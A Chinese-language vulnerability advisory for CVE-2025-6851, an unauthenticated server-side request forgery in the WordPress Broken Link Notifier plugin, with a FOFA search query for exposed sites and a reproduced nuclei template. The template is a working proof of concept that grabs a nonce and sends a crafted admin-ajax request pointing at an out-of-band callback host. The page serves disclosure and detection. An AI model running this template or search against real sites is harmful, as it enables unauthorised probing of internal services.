WordPress Broken Link Notifier 服务器端请求伪造漏洞

漏洞信息

漏洞名称： WordPress Broken Link Notifier 服务器端请求伪造漏洞

漏洞编号：

• CVE： CVE-2025-6851

漏洞类型： 服务器端请求伪造

漏洞等级： 高危

漏洞描述： WordPress的Broken Link Notifier插件在1.3.0及之前的所有版本中，存在一个服务器端请求伪造（SSRF）漏洞。该漏洞源于ajax_blinks()函数最终调用的check_url_status_code()函数，使得未经认证的攻击者能够从Web应用程序发起对任意位置的Web请求。这可以被用来查询和修改内部服务的信息。受影响的插件主要用于WordPress网站中，帮助网站管理员检测和通知网站上的坏链，是网站维护的常用工具之一。漏洞的技术根源在于对用户提供的URL输入缺乏充分的验证和过滤，导致攻击者可以构造恶意请求，绕过安全限制，访问或操作内部网络资源。这种漏洞的危害性较高，攻击者可以利用它进行内部服务探测、数据泄露甚至进一步的攻击。由于漏洞利用不需要认证，且可以自动化执行，因此对所有使用受影响版本插件的WordPress网站构成了严重威胁。建议用户立即更新插件至1.3.1或更高版本，以修复此漏洞。

产品厂商： broken_link_notifier_project

产品名称： Broken Link Notifier

影响版本： version <= 1.3.0

搜索语法： body=”blnotifier_front_end”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/619507861c407516e9bdac3c1b4cd9c1ce7e96ce/http%2Fcves%2F2025%2FCVE-2025-6851.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-6851

info:
  name: WordPress Broken Link Notifier < 1.3.1 - Unauthenticated SSRF
  author: iamnoooob,pdresearch
  severity: high
  description: |
    The Broken Link Notifier plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.0 via the ajax_blinks() function which ultimately calls the check_url_status_code() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
  impact: |
    An attacker can exploit this vulnerability to perform server-side request forgery attacks, potentially accessing internal services, reading local files, or conducting port scanning from the server's perspective.
  remediation: |
    Update the Broken Link Notifier plugin to version 1.3.1 or later which fixes this vulnerability. If immediate update is not possible, consider temporarily disabling the plugin until the fix can be applied.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6851
    - https://wpscan.com/vulnerability/CVE-2025-6851
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/broken-link-notifier/broken-link-notifier-130-unauthenticated-server-side-request-forgery
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-6851
    cwe-id: CWE-918
    epss-score: 0.00043
    epss-percentile: 0.09677
    cpe: cpe:2.3:a:broken_link_notifier_project:broken_link_notifier:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: broken_link_notifier_project
    product: broken_link_notifier
    publicwww-query: "/wp-content/plugins/broken-link-notifier/"
    fofa-query: body="blnotifier_front_end"
  tags: cve,cve2025,wp-plugin,wordpress,ssrf,oast,unauth,wpscan,broken-link-notifier

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - contains(body, 'blnotifier_front_end')
        internal: true

    extractors:
      - type: regex
        part: body
        internal: true
        name: nonce
        group: 1
        regex:
          - 'blnotifier_front_end.*"nonce":"(.*?)"'

  - raw:
      - |-
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: xmlhttprequest
        Content-Type: application/x-www-form-urlencoded

        action=blnotifier_blinks&nonce={{nonce}}&source_url=http://test&header_links[]=http://{{interactsh-url}}&

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains_all(body, 'notify', 'timing', 'Results were generated in')
          - status_code == 200
        condition: and